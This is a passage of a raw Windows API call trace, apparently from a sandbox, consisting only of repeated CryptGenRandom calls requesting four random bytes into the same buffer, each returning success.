1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 